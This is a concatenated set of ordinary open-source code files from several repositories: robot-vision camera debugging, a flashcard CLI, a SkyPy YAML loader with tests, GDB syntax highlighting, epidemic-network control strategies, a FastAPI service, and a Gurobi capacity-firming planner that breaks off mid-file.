        self.device_list['OAK-2']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
if 'target_x' not in bbox:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Edge", edgeFrame)
cv2.imshow("OAK-1", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting object-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
``` |
{
"source": "jonathandasilvasantos/2020-benkyo-cli-flashcards",
"score": 2
} |
#### File: benkyo/commands/add.py
```python
import click
import os
from ..model.card import Card
from ..utils.validate import assert_repository_is_avaliable
from ..utils.config import read_config
from subprocess import call
import sys
@click.command()
@click.option('--front', '-f', prompt='Frontal Face', help='Frontal Face of the new card.', required=True)
@click.option('--hidden', '-hf', prompt='Hidden Face', help='Hidden face of the new card.', required=True)
@click.option('--tag', '-t', default='default', prompt='TAG', help='TAG of the new card.', required=False)
@click.option('--count', '-c', required=False, type=click.INT, default=1, help='How many entries. Set -1 to add entries without a predefined limit.')
def add(front, hidden, tag, count):
assert_repository_is_avaliable()
card = Card()
card.frontal = front
card.hidden = hidden
card.tag = tag
card.save()
if (count > 1) or (count < 0):
if count < 0:
click.confirm('Do you want to continue?', abort=True)
cmdline = ['benkyo', 'add', '-c', str(count-1) ]
call(cmdline)
```
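To add several cards in a row, the command above re-invokes the `benkyo add` CLI through `subprocess.call`, decrementing `--count` each time. The sketch below shows a single-process alternative that keeps prompting with `click.prompt`; it illustrates the idea rather than the project's command, and the `save_card` helper is hypothetical.
```python
import click


def save_card(front, hidden, tag):
    # Hypothetical stand-in for Card(...).save() from the project's model.
    click.echo(f"saved: {front} / {hidden} [{tag}]")


@click.command()
@click.option('--count', '-c', type=click.INT, default=1,
              help='How many cards to add; -1 keeps prompting until you stop.')
def add_many(count):
    added = 0
    while count < 0 or added < count:
        front = click.prompt('Frontal Face')
        hidden = click.prompt('Hidden Face')
        tag = click.prompt('TAG', default='default')
        save_card(front, hidden, tag)
        added += 1
        if count < 0 and not click.confirm('Add another card?', default=True):
            break


if __name__ == '__main__':
    add_many()
```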
#### File: benkyo/commands/remove.py
```python
import click
from ..model.card import Card
import peewee
@click.command()
@click.argument('removeall', default='', type=click.STRING, required=False)
@click.option('--cardid', '-id', type=click.INT, default=-1, help='Specify a card to be removed')
@click.option('--tag', '-t', type=click.STRING, default='', help='Remove all cards of a TAG')
def remove(removeall, cardid, tag):
all = False
if removeall == 'all': all = True
if (cardid == -1) and (len(tag) < 1) and (all == False):
click.echo("Ops! You need to specify a card id or a tag to execute this command!")
exit(1)
query = ''
if cardid != -1:
query = Card.delete().where(Card.id == cardid)
if len(tag) > 0:
query = Card.delete().where(Card.tag == tag)
if all:
click.confirm('Are you sure that you want to remove all cards?', abort=True)
query = Card.delete()
result = query.execute()
click.echo(str(result) + ' card(s) removed.')
```
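The removal command builds one peewee delete query and reports how many rows `execute()` returned. Below is a self-contained sketch of that query pattern against an in-memory SQLite database; the `Flashcard` model is invented for the example and is not the project's `Card` model.
```python
import peewee

db = peewee.SqliteDatabase(':memory:')


class Flashcard(peewee.Model):
    # Invented minimal model for the example; the project's Card model differs.
    frontal = peewee.CharField()
    tag = peewee.CharField(default='default')

    class Meta:
        database = db


db.create_tables([Flashcard])
Flashcard.create(frontal='hola', tag='spanish')
Flashcard.create(frontal='bonjour', tag='french')
Flashcard.create(frontal='ciao', tag='italian')

# Same pattern as remove(): build a delete query, then execute() returns the row count.
removed = Flashcard.delete().where(Flashcard.tag == 'spanish').execute()
print(f'{removed} card(s) removed, {Flashcard.select().count()} left')
```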
#### File: view/model/uicarddata.py
```python
class UICardData:
id = -1
frontal = ''
hidden = ''
tag = ''
def __init__(self, id, frontal, hidden, tag):
self.id = id
self.frontal = frontal
self.hidden = hidden
self.tag = tag
# Backup values to restore during an editing canceled process
self._frontal = frontal
self._hidden = hidden
self._tag = tag
``` |
{
"source": "Jonathan-DataScience/lambdata",
"score": 3
} |
#### File: lambdata/lambdata/helper_functions.py
```python
import pandas as pd
import numpy as np
class CleaningDatabase(pd.DataFrame):
    def null_count(self):
        """Return the total number of missing cells in the frame."""
        df2 = self.isnull().sum()
        dfsum = df2.sum()
        return dfsum
    def list_2_series(list, df):
        """Select the columns of df labelled in `list` (note: shadows the builtin and takes no self)."""
        df2 = df[pd.Series(list)]
        return df2
```
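`null_count` sums the per-column null counts a second time to get one total, while `list_2_series` indexes the frame with a Series of column labels (and, despite its name, returns a sub-DataFrame). The toy sketch below demonstrates both operations, assuming nothing beyond pandas and numpy.
```python
import numpy as np
import pandas as pd

df = pd.DataFrame({'a': [1, np.nan, 3], 'b': [np.nan, np.nan, 6], 'c': [7, 8, 9]})

# Total number of missing cells: per-column counts, then summed again.
total_nulls = df.isnull().sum().sum()
print(total_nulls)  # 3

# Indexing with a list (or Series) of labels selects those columns as a DataFrame.
subset = df[pd.Series(['a', 'c'])]
print(subset.columns.tolist())  # ['a', 'c']
```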
#### File: lambdata/lambdata/__init__.py
```python
import pandas as pd
import numpy as np
def df_cleanser(df):
"""Cleans pd.DataFrame"""
# TODO - Implement
pass
``` |
{
"source": "JonathanDHarris/skypy",
"score": 2
} |
#### File: skypy/pipeline/_config.py
```python
import builtins
from importlib import import_module
import yaml
__all__ = [
'load_skypy_yaml',
]
def import_function(qualname):
'''load function from fully qualified name'''
path = qualname.split('.')
module = builtins
for i, key in enumerate(path[:-1]):
if not hasattr(module, key):
module = import_module('.'.join(path[:i+1]))
else:
module = getattr(module, key)
function = getattr(module, path[-1])
return function
class SkyPyLoader(yaml.SafeLoader):
'''custom YAML loader class with SkyPy extensions'''
@classmethod
def load(cls, stream):
'''load the first YAML document from stream'''
loader = cls(stream)
try:
return loader.get_single_data()
finally:
loader.dispose()
def construct_function(self, name, node):
'''load function from !function tag
tags are stored as a tuple `(function, args)`
'''
if isinstance(node, yaml.ScalarNode):
args = self.construct_scalar(node)
elif isinstance(node, yaml.SequenceNode):
args = self.construct_sequence(node)
elif isinstance(node, yaml.MappingNode):
args = self.construct_mapping(node)
try:
function = import_function(name)
except (ModuleNotFoundError, AttributeError) as e:
raise ImportError(f'{e}\n{node.start_mark}') from e
return (function,) if args == '' else (function, args)
# constructor for generic functions
SkyPyLoader.add_multi_constructor('!', SkyPyLoader.construct_function)
def load_skypy_yaml(filename):
'''Read a SkyPy pipeline configuration from a YAML file.
Parameters
----------
filename : str
The name of the configuration file.
'''
# read the YAML file
with open(filename, 'r') as stream:
return SkyPyLoader.load(stream) or {}
```
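`import_function` walks a dotted name and only imports a module when the next attribute is not already reachable, starting from `builtins`, which is what lets the `!function` tags reference both builtins and library functions. A short usage sketch is below; the import path `skypy.pipeline._config` is an assumption based on the file location above.
```python
# Assumes the module above is importable as skypy.pipeline._config.
from skypy.pipeline._config import import_function

sqrt = import_function('math.sqrt')   # imports math, then resolves the attribute
print(sqrt(9.0))                      # 3.0

length = import_function('len')       # a bare name resolves directly from builtins
print(length([1, 2, 3]))              # 3
```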
#### File: pipeline/tests/test_config.py
```python
from astropy.utils.data import get_pkg_data_filename
from collections.abc import Callable
import pytest
from skypy.pipeline import load_skypy_yaml
def test_load_skypy_yaml():
# Read empty config file
filename = get_pkg_data_filename('data/empty_config.yml')
assert load_skypy_yaml(filename) == {}
# Read config file and check entries are parsed to the correct types
filename = get_pkg_data_filename('data/test_config.yml')
config = load_skypy_yaml(filename)
assert isinstance(config['test_int'], int)
assert isinstance(config['test_float'], float)
assert isinstance(config['test_str'], str)
assert isinstance(config['test_func'], tuple)
assert isinstance(config['test_cosmology'][0], Callable)
assert isinstance(config['test_cosmology'][1], dict)
assert isinstance(config['tables']['test_table_1']['test_column_3'][0], Callable)
assert isinstance(config['tables']['test_table_1']['test_column_3'][1], list)
# Bad function
filename = get_pkg_data_filename('data/bad_function.yml')
with pytest.raises(ImportError):
load_skypy_yaml(filename)
# Bad module
filename = get_pkg_data_filename('data/bad_module.yml')
with pytest.raises(ImportError):
load_skypy_yaml(filename)
```
#### File: power_spectrum/tests/test_camb.py
```python
import numpy as np
from astropy.cosmology import Planck15
from astropy.units import allclose
from astropy.utils.data import get_pkg_data_filename
import pytest
# load the external camb result to test against
camb_result_filename = get_pkg_data_filename('data/camb_result.txt')
test_pzk = np.loadtxt(camb_result_filename)
# try to import the requirement, if it doesn't exist, skip test
try:
__import__('camb')
except ImportError:
CAMB_NOT_FOUND = True
else:
CAMB_NOT_FOUND = False
@pytest.mark.skipif(CAMB_NOT_FOUND, reason='CAMB not found')
def test_camb():
'''
Test a default astropy cosmology
'''
from skypy.power_spectrum import camb
# test shape and compare with the mocked power spectrum
redshift = [0.0, 1.0]
wavenumber = np.logspace(-4.0, np.log10(2.0), 200)
pzk = camb(wavenumber, redshift, Planck15, 2.e-9, 0.965)
assert pzk.shape == (len(redshift), len(wavenumber))
assert allclose(pzk, test_pzk, rtol=1.e-4)
# also check redshifts are ordered correctly
redshift = [1.0, 0.0]
pzk = camb(wavenumber, redshift, Planck15, 2.e-9, 0.965)
assert pzk.shape == (len(redshift), len(wavenumber))
assert allclose(pzk, test_pzk[np.argsort(redshift), :], rtol=1.e-4)
``` |
{
"source": "jonathanding/gef",
"score": 2
} |
#### File: gef/color/message.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from color import generateColorFunction
def on(msg):
return generateColorFunction('green')(msg)
def off(msg):
return generateColorFunction('red')(msg)
def notice(msg):
return generateColorFunction('purple')(msg)
def hint(msg):
return generateColorFunction('yellow')(msg)
def success(msg):
return generateColorFunction('green')(msg)
def warn(msg):
return generateColorFunction('yellow')(msg)
def error(msg):
return generateColorFunction('red')(msg)
def system(msg):
return generateColorFunction('light-red')(msg)
def exit(msg):
return generateColorFunction('red')(msg)
def breakpoint(msg):
return generateColorFunction('yellow')(msg)
def signal(msg):
return generateColorFunction('bold,red')(msg)
def prompt(msg):
return generateColorFunction('bold,red')(msg)
```
#### File: jonathanding/gef/highlighter.py
```python
import re
from functools import lru_cache
import color.syntax_highlight as HH
@lru_cache(maxsize=256)
def highlight_file(filename):
# Notice that the code is cached
with open(filename, encoding='utf-8') as f:
source = f.read()
raw_lines = source.splitlines()
source = HH.syntax_highlight(source, filename)
source_lines = source.splitlines()
return [line.rstrip() for line in source_lines], [line.rstrip() for line in raw_lines]
def highlight_asm(code):
return HH.syntax_highlight(code, filename=".asm")
def highlight_source_code(source, fpath, with_line_number=True):
    # NOTE: always returns here; the line-number handling below is left disabled
    return HH.syntax_highlight(source, fpath)
if not with_line_number:
return HH.syntax_highlight(source, fpath)
lines = source.splitlines()
line_numbers = []
for i, l in enumerate(lines):
num = re.findall(r'^\s*[0-9]+\s', l)
if num:
line_numbers.append(num[0])
lines[i] = l[len(num[0]):]
else:
line_numbers.append('')
lines = HH.syntax_highlight('\n'.join(lines), fpath).splitlines()
return '\n'.join([a + b for a, b in zip(line_numbers, lines)])
class FormatInst():
def __init__(self, line):
self.line = line
self.is_inst = False
self.header = ''
self.op = ''
self.operands = ''
self.is_inst = self.parse()
if self.is_inst:
self.normalize_operands()
def parse(self):
# => 0x00007ffff6d7cf4c <+12>: movabs rax,0xaaaaaaaaaaaaaaaa
if not re.findall(r'0x[0-9a-f]+.*:', self.line):
return False
parts = re.split(r'(>:\s+)', self.line)
if len(parts) < 3:
return False
self.header = parts[0] + parts[1]
parts = "".join(parts[2:]).split()
self.op = parts[0]
if len(parts) > 1:
self.operands = " ".join(parts[1:])
return True
def normalize_operands(self):
s = self.operands
# pygment doesn't recognize "QWORD PTR" etc., need to be "qword ptr"
s = " ".join([x.lower() if x.isupper() else x for x in s.split()])
# pygment cannot colorify the 0x10 in "rbp-0x10", need to be "rbp - 0x10"
s = re.sub(r'([^-+*/])(\+|-|\*|/)([^-+*/])', r'\1 \2 \3', s)
# reduce the spaces before the comment started with #
s = re.sub(r'\s+(#.*)', r' \1', s)
self.operands = s
def highlighted_str(self):
if not self.is_inst:
return self.line
code = "{:6s} {:s}".format(self.op, self.operands)
# highlight and replace the color <..>
# remove the spaces in <..>
parts = re.split(r'(<.*>)', code)
for i, p in enumerate(parts):
if p.startswith('<') and p.endswith('>'):
parts[i] = "".join(p.split())
code = "".join(parts)
highlighted_code = highlight_asm(code)
# then replace the <> with our format
raw_parts = code.split()
parts = highlighted_code.split()
for i, p in enumerate(raw_parts):
if p.startswith('<') and p.endswith('>'):
parts[i] = '\033[35m' + p + '\033[0m' # pink
# op need aligned
parts[0] = '\033[33m' + "{:6s}".format(self.op) + '\033[0m' # yellow
code = " ".join(parts)
# current line
if re.findall(r'^\s*=>\s', self.header):
header = '\033[32m' + self.header + '\033[0m' # green
else:
# sub doesn't support \033
parts = re.split(r'\+(\d+)>:', self.header)
header = parts[0] + '+\033[35m' + parts[1] + '\033[0m>:' + "".join(parts[2:])
return header + code
def highlight_gdb_disassemble(code):
insts = [FormatInst(l) for l in code.splitlines()]
return '\n'.join([inst.highlighted_str() for inst in insts])
``` |
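`FormatInst.normalize_operands` massages GDB's operand text so the highlighter can colour it: fully uppercase tokens such as `QWORD PTR` are lowered, arithmetic inside memory operands gets surrounding spaces, and whitespace before a trailing `#` comment is reduced. The snippet below replays those three substitutions on a sample operand string using only `re`.
```python
import re

s = "QWORD PTR [rbp-0x10]    # local variable"

# 1. lower fully-uppercase tokens so pygments recognises "qword ptr"
s = " ".join(x.lower() if x.isupper() else x for x in s.split())

# 2. add spaces around + - * / so "rbp-0x10" highlights as "rbp - 0x10"
s = re.sub(r'([^-+*/])(\+|-|\*|/)([^-+*/])', r'\1 \2 \3', s)

# 3. reduce any whitespace before a trailing "#" comment to a single space
s = re.sub(r'\s+(#.*)', r' \1', s)

print(s)  # qword ptr [rbp - 0x10] # local variable
```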
{
"source": "jonathan-doenz/spanish_flu_on_airports",
"score": 3
} |
#### File: spanish_flu_on_airports/scripts/control_strategies.py
```python
import numpy as np
import networkx as nx
import collections
import random
########################################
######### Control strategies ###########
########################################
def random_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove random nodes (airports) of the graph."""
if verbose:
print('Perform random vaccination...')
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
nodes_list = list(gsc_SC_KM.nodes)
random.shuffle(nodes_list)
nodes_to_remove = nodes_list[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def random_neighbors_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove random neighbor of random nodes (airports) of the graph."""
if verbose:
print('Perform selected vaccination...')
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
nodes_list = list(gsc_SC_KM.nodes)
random.shuffle(nodes_list)
random_initial_nodes = nodes_list[:num_nodes_to_remove]
# pick one random adjacent node from each of the initial nodes
nodes_to_remove_set = set()
for node_id in random_initial_nodes:
neighbours_list = [neighbor for neighbor in gsc_SC_KM.neighbors(node_id)]
random.shuffle(neighbours_list)
nodes_to_remove_set.add(neighbours_list[0])
nodes_to_remove = list(nodes_to_remove_set)
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove nodes (airports) with the highest degree (number of connections)."""
if verbose:
print('Perform largest_airports_removals...')
# get the node ids to remove
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
degree_dict = {n: d for n, d in gsc_SC_KM.degree()}
ordered_degree_dict = {key: val for key, val in sorted(degree_dict.items(), key=lambda item: item[1], reverse=True)}
nodes_to_remove = list(ordered_degree_dict.keys())[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_infected_airports_removal(gsc_SC_KM, nodes_statuses_pre_treatment,
verbose, method_kwargs):
"""Remove infected nodes (airports) with the highest degree (number of connections)."""
if verbose:
print('Perform largest_infected_airports_removals...')
# get the node ids to remove
num_nodes_to_remove = int( gsc_SC_KM.number_of_nodes() * \
method_kwargs['nodes_percentage_to_treat'] / 100 )
degree_dict = {n: d for n, d in gsc_SC_KM.degree()}
ordered_degree_dict = {key: val for key, val in sorted(degree_dict.items(), key=lambda item: item[1], reverse=True)}
infected_ordered_degree_dict = {node_id: deg for node_id, deg in ordered_degree_dict.items() \
if nodes_statuses_pre_treatment[node_id] == 'I'}
nodes_to_remove = list(infected_ordered_degree_dict.keys())[:num_nodes_to_remove]
# get the graph and dict with these nodes removed
treated_graph, nodes_statuses_post_treatment = \
remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM,
nodes_statuses_pre_treatment)
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_nodes_to_remove'] = num_nodes_to_remove
treatment_info['nodes_to_remove'] = nodes_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
def largest_routes_removal(gsc_SC_KM, nodes_statuses_pre_treatment, verbose, method_kwargs):
"""Remove edges (routes) with the highest weights (number of flights)."""
if verbose:
print('Perform largest_routes_removals...')
# get the edges to remove
num_edges_to_remove = int( gsc_SC_KM.number_of_edges() * \
method_kwargs['edges_percentage_to_treat'] / 100 )
edges_dict = {edge: gsc_SC_KM.edges[edge]['weight'] for edge in gsc_SC_KM.edges}
ordered_edges_dict = {key: val for key, val in sorted(edges_dict.items(), key=lambda item: item[1], reverse=True)}
edges_to_remove = list(ordered_edges_dict)[:num_edges_to_remove]
# get the graph and dict with these edges removed
treated_graph = \
remove_edges_from_graph(edges_to_remove, gsc_SC_KM)
nodes_statuses_post_treatment = nodes_statuses_pre_treatment.copy()
# report changes in a dict
treatment_info = method_kwargs.copy()
treatment_info['num_edges_to_remove'] = num_edges_to_remove
treatment_info['edges_to_remove'] = edges_to_remove
return treated_graph, nodes_statuses_post_treatment, treatment_info
#########################################################
# Helper functions for the control strategies functions #
#########################################################
def remove_nodes_from_graph_and_dict(nodes_to_remove, gsc_SC_KM, nodes_statuses_pre_treatment):
"""Remove nodes from graph and nodes_statuses dict."""
treated_graph = gsc_SC_KM.copy()
nodes_statuses_post_treatment = nodes_statuses_pre_treatment.copy()
for node_id in nodes_to_remove:
treated_graph.remove_node(node_id)
del nodes_statuses_post_treatment[node_id]
return treated_graph, nodes_statuses_post_treatment
def remove_edges_from_graph(edges_to_remove, gsc_SC_KM):
"""Remove edges from graph."""
treated_graph = gsc_SC_KM.copy()
for u, v in edges_to_remove:
treated_graph.remove_edge(u, v)
return treated_graph
``` |
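Every strategy above shares the same interface: it receives the airport graph, the node-status dict, a verbosity flag, and a `method_kwargs` dict holding the percentage to treat, and it returns the treated graph, the updated statuses, and a report dict. The sketch below exercises `largest_airports_removal` on a small random graph; it assumes this file is importable as `control_strategies`, and the 'S'/'I'/'R' status assignment is made up for the example.
```python
import random

import networkx as nx

# Assumes the module above is importable as control_strategies.
from control_strategies import largest_airports_removal

random.seed(0)
graph = nx.gnp_random_graph(50, 0.1, seed=0)          # stand-in for the airport network
statuses = {node: random.choice(['S', 'I', 'R']) for node in graph.nodes}

treated_graph, treated_statuses, info = largest_airports_removal(
    graph, statuses, verbose=True,
    method_kwargs={'nodes_percentage_to_treat': 10},
)
print(info['num_nodes_to_remove'], graph.number_of_nodes(), treated_graph.number_of_nodes())
```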
{
"source": "JonathanDuarteGH/python-microservice-fastapi",
"score": 2
} |
#### File: cast_service/app/main.py
```python
from fastapi import FastAPI
from app.api.casts import casts
from app.api.db import metadata, database, engine
metadata.create_all(engine)
app = FastAPI(openapi_url="/api/v1/casts/openapi.json",
docs_url="/api/v1/casts/docs")
@app.on_event("startup")
async def startup():
await database.connect()
@app.on_event("shutdown")
async def shutdown():
await database.disconnect()
app.include_router(casts, prefix='/api/v1/casts', tags=['casts'])
``` |
{
"source": "jonathandumas/capacity-firming",
"score": 2
} |
#### File: determinist/algorithms/planner_MILP.py
```python
import math
import os
import time
import numpy as np
import pandas as pd
import gurobipy as gp
from gurobipy import GRB
from ro.utils import dump_file, build_observations, build_point_forecast
from root_project import ROOT_DIR
import matplotlib.pyplot as plt
from ro.ro_simulator_configuration import PARAMETERS
class Planner_MILP():
"""
MILP capacity firming formulation: binary variables to avoid simultaneous charge and discharge.
:ivar nb_periods: number of market periods (-)
:ivar period_hours: period duration (hours)
:ivar soc_ini: initial state of charge (kWh)
:ivar soc_end: final state of charge (kWh)
:ivar deadband_penalty: deadband deviation between production and nomination, % of the total installed capacity (kW)
constant for all market periods
:ivar pv_forecast: PV point forecasts (kW)
:ivar engagement: Nomination to the grid (injection > 0, withdrawal < 0) (kW)
shape = (nb_market periods,)
:ivar df_parameters: pd.DataFrame with price, deadband_nomination, min_nomination, max_nomination, min_production, max_production
shape = (nb_market periods, 6)
:ivar selling_price: selling price (€/ kWh)
different between of-peak and peak hours
:ivar deadband_nomination: deadband between two consecutive nominations, % of the total installed capacity (kW)
different between of-peak and peak hours
shape = (nb_market periods,)
:ivar model: a Gurobi model (-)
"""
def __init__(self, pv_forecast:np.array, engagement:np.array=None):
"""
Init the planner.
"""
self.parameters = PARAMETERS # simulation parameters
self.period_hours = PARAMETERS['period_hours'] # (hour)
self.nb_periods = int(24 / self.period_hours)
self.t_set = range(self.nb_periods)
self.pv_forecast = pv_forecast # (kW)
self.engagement = engagement # (kW)
self.PVcapacity = PARAMETERS['pv_capacity'] # (kWp)
self.tol_penalty = PARAMETERS['tol_penalty'] # (%)
self.deadband_penalty = self.tol_penalty * self.PVcapacity # (kW)
self.penalty_factor = PARAMETERS['penalty_factor'] # penalty factor
self.overproduction = PARAMETERS['OVERPRODUCTION'] # forbid overproduction
if all([item in PARAMETERS['df_params'].columns for item in ['price', 'deadband_nomination', 'min_nomination', 'max_nomination', 'min_production','max_production']]):
self.selling_price = PARAMETERS['df_params']['price'].values # (€/ kWh)
self.deadband_nomination = PARAMETERS['df_params']['deadband_nomination'].values # (kW/period)
self.min_nomination = PARAMETERS['df_params']['min_nomination'].values # (kW)
self.max_nomination = PARAMETERS['df_params']['max_nomination'].values # (kW)
self.min_production = PARAMETERS['df_params']['min_production'].values # (kW)
self.max_production = PARAMETERS['df_params']['max_production'].values # (kW)
else:
print("df_parameters is not ok ")
# BESS parameters
self.BESScapacity = PARAMETERS['BESS']['BESS_capacity'] # (kWh)
self.soc_ini = PARAMETERS['BESS']['soc_ini'] # (kWh)
self.soc_end = PARAMETERS['BESS']['soc_end'] # (kWh)
self.soc_min = PARAMETERS['BESS']['soc_min'] # (kWh)
self.soc_max = PARAMETERS['BESS']['soc_max'] # (kWh)
self.charge_eff = PARAMETERS['BESS']['charge_eff'] # (/)
self.discharge_eff = PARAMETERS['BESS']['discharge_eff'] # (/)
self.charge_power = PARAMETERS['BESS']['charge_power'] # (kW)
self.discharge_power = PARAMETERS['BESS']['discharge_power'] # (kW)
self.high_soc_price = PARAMETERS['BESS']['HIGH_SOC_PRICE'] # (euros/kWh) -> fictive price to incentivize to charge BESS
self.time_building_model = None
self.time_solving_model = None
# Create model
self.model = self.create_model()
# Solve model
self.solver_status = None
def create_model(self):
"""
Create the optimization problem.
"""
t_build = time.time()
# -------------------------------------------------------------------------------------------------------------
# 1. create model
model = gp.Model("planner_MILP_gurobi")
# -------------------------------------------------------------------------------------------------------------
# 2. create variables
# 2.1 First-stage variables -> x
x = model.addVars(self.nb_periods, lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="x") # Nomination at the grid coupling point (injection > 0, withdrawal < 0) (kW)
if self.engagement is not None:
for i in self.t_set:
x[i].setAttr("ub", self.engagement[i])
x[i].setAttr("lb", self.engagement[i])
# 2.2 Second-stage variables -> y
y_prod = model.addVars(self.nb_periods, lb=-GRB.INFINITY, ub=GRB.INFINITY, obj=-0, vtype=GRB.CONTINUOUS, name="y_prod") # Production at the grid coupling point (injection > 0, withdrawal < 0) (kW)
y_short_dev = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_short_dev") # y_short_dev >= - (y_prod - x-) with x- = x - deadband_deviation_kW
y_long_dev = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_long_dev") # y_long_dev >= - (x+ - y_prod) with x+ = x + deadband_deviation_kW
y_s = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_s") # State of charge of the battery (kWh)
y_charge = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_charge") # Charging power (kW)
y_discharge = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_discharge") # Discharging power (kW)
y_PV = model.addVars(self.nb_periods, lb=0, ub=GRB.INFINITY, obj=0, vtype=GRB.CONTINUOUS, name="y_PV") # PV generation (kW)
y_b = model.addVars(self.nb_periods, obj=0, vtype=GRB.BINARY, name="y_b") # binary variable -> y_b = 1 -> charge / y_b = 0 -> discharge
# -------------------------------------------------------------------------------------------------------------
# 3. create objective
objective = gp.quicksum(self.period_hours * self.selling_price[i] * (-y_prod[i] + self.penalty_factor * (y_short_dev[i] + y_long_dev[i])) - self.high_soc_price * y_s[i] for i in self.t_set)
model.setObjective(objective, GRB.MINIMIZE)
# -------------------------------------------------------------------------------------------------------------
# 4. create constraints
# 4.1 First stage constraints
# engagement min cst
model.addConstrs((x[i] >= self.min_nomination[i] for i in self.t_set), name='c_xmin')
# engagement max cst
model.addConstrs((x[i] <= self.max_nomination[i] for i in self.t_set), name='c_xmax')
# engagement ramping constraint up -> skip first period -> nb periods -1 constraints
model.addConstrs((x[i] - x[i - 1] <= self.deadband_nomination[i] for i in range(1, self.nb_periods)), name='c_x_rampingUp')
# engagement ramping constraint down -> skip first period -> nb periods -1 constraints
model.addConstrs((x[i - 1] - x[i] <= self.deadband_nomination[i] for i in range(1, self.nb_periods)), name='c_x_rampingDown')
# 4.2 Second-stage constraints
# max charge cst
model.addConstrs((y_charge[i] <= y_b[i] * self.charge_power for i in self.t_set), name='c_max_charge')
# max discharge cst
model.addConstrs((y_discharge[i] <= (1 - y_b[i]) * self.discharge_power for i in self.t_set), name='c_max_discharge')
# min soc cst
model.addConstrs((y_s[i] >= self.soc_min for i in self.t_set), name='c_min_s')
        # max soc cst
model.addConstrs((y_s[i] <= self.soc_max for i in self.t_set), name='c_max_s')
